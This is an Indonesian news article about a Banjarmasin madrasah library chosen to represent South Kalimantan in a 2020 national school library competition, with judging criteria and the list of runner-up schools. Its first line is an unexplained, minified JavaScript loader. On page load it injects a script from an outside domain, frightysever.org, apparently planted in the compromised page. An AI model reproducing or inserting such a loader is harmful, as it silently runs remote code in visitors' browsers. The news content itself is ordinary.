(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Dispersip Kalsel

Jadi Wakil Kalsel, Perpustakaan MAN 2 Banjarmasin Bakal Bersaing di Tingkat Nasional


KANALKALIMANTAN.COM, BANJARMASIN – Kabar gembira datang dari salah satu sekolah di Kalsel. Madrasah Aliyah Negeri (MAN) 2 Banjarmasin akan mewakili Provinsi Kalimantan Selatan dalam lomba perpustakaan SLTA sederajat tingkat nasional tahun 2020.

Torehan prestasi tersebut diketahui saat Kepala Dinas Perpustakaan dan Kearsipan (Dispersip) Kalimantan Selatan Dra Hj Nurlaiani Dardie menyampaikan pada awak Kanalkalimantan.com  Jumat (10/7/2020) siang.

Ia menceritakan, terpilihnya sekolah yang berlokasi di kawasan jalan Pramuka, Kecamatan Banjarmasin Timur itu merupakan hasil dari penilaian Tim Juri Lomba Perpustakaan tingkat SLTA dan sederajat se-Kalsel, yang memutuskan perpustakaan milik sekolah tersebut sangat layak menjadi juara pertama di tingkat provinsi.

“Hasil inilah yang mengantarkan mereka ke lomba perpustakaan tingkat nasional,” kata Bunda Nunung-sapaan akrabnya-.

Bunda Nunung berharap, agar pengelola perpustakaan MAN 2 Banjarmasin ini segera mempersiapkan segala hal sedini mungkin. Untuk menghadapi lomba tingkat nasional yang akan divisitasi dan dinilai oleh tim juri dari Perpusnas RI tersebut.

“Kita doakan perpustakaan milik sekolah itu minimal bisa masuk 15 besar dari 34 Provinsi dan diundang ke Jakarta pada bulan September 2020 untuk presentasi,” kata Bunda Nunung.

Untuk kriteria penilaiannya sendiri, Bunda Nunung memberi sedikit bocoran, tim juri akan menilai berkas yang diterima dan dilanjutkan dengan mengunjungi langsung ke perpustakaan sekolah yang mengikuti lomba untuk menilai bagaimana sistem pengelolaan perpustakaan.

Selain itu, kemampuan dari SDM juga dijadikan penilaian, jumlah buku yang tersedia di perpustakaan serta apa saja judul buku yang ada.

“Bahkan bangunan perpustakaan dan sirkulasi buku di perpustakaan sekolah tersebut juga masuk dalam penilaian,” tambahnya.

Menurutnya, prestasi yang diraih oleh perpustakaan MAN 2 Banjarmasin  ini tidaklah dicapai dengan cara yang instan. Untuk bisa menjadi perwakilan Kalsel di perhelatan nasional, mereka menyingkirkan 5 perpustakaan sekolah lainnya.

Diantaranya adalah perpustakaan SMK Shalatiyah Bitin Kabupaten Hulu Sungai Utara, SMAN 1 Tanta Kabupaten Tabalong, SMK Darussalam Kabupaten Banjar, SMKN 2 Simpang Empat Kabupaten Tanah Bumbu dan SMAN 2 Kabupaten Kotabaru.

“Kami ucapkan selamat kepada MAN 2 Banjarmasin. Tapi jangan berkecil hati, bagi yang belum juara agar tetap semangat dan berlanjut meningkatkan pelayanan perpustakaan SLTA sederajat agar lebih baik lagi walaupun masih dalam keadaan pandemi Covid-19,” pungkas Bunda Nunung. (kanalkalimantan.com/fikri)

Reporter : Fikri
Editor : bie

Al Ghifari

Recent Posts

Banjarbaru Posisi Kedua Klasemen Sementara Popda Kalsel 2024

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah cabang olahraga (cabor) unggulan membawa kontingen Kota Banjarbaru bertengger di posisi… Read More

50 menit ago

Hasnur Resmi Lamar Partai Golkar, Mencari ‘Pintu’ Koalisi Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Langkah Hasnuryadi Sulaiman untuk maju pada kontestasi Pemilihan Gubernur dan Wakil Gubernur… Read More

3 jam ago

Pasti Maju Pilwali Banjarbaru, Ovie Simpan Nama Pasangan

KANALKALIMANTAN.COM, BANJARBARU - Aditya Mufti Ariffin memastikan akan kembali berkontestasi dalam Pemilihan Kepala Daerah (Pilkada)… Read More

4 jam ago

Soal Caleg Terpilih Mundur atau Tidak Mundur Jika Maju Pilkada, Begini Penjelasan KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Anggota Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel), Fahmi Failasopa menegaskan… Read More

6 jam ago

Jalan Pangeran Suriansyah Banjarbaru Steril PKL dan Parkir Tepi Jalan

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas Pedagang Kaki Lima alias PKL di sepanjang jalan Pangeran Suriansyah, Kelurahan… Read More

8 jam ago

Wapres Serahkan Motor Perpustakaan Keliling ke Pemkab HSU

KANALKALIMANTAN.COM, JAKARTA - Wakil Presiden RI, KH Ma’ruf Amin secara simbolis menyerahkan bantuan Motor Perpustakaan… Read More

9 jam ago

This website uses cookies.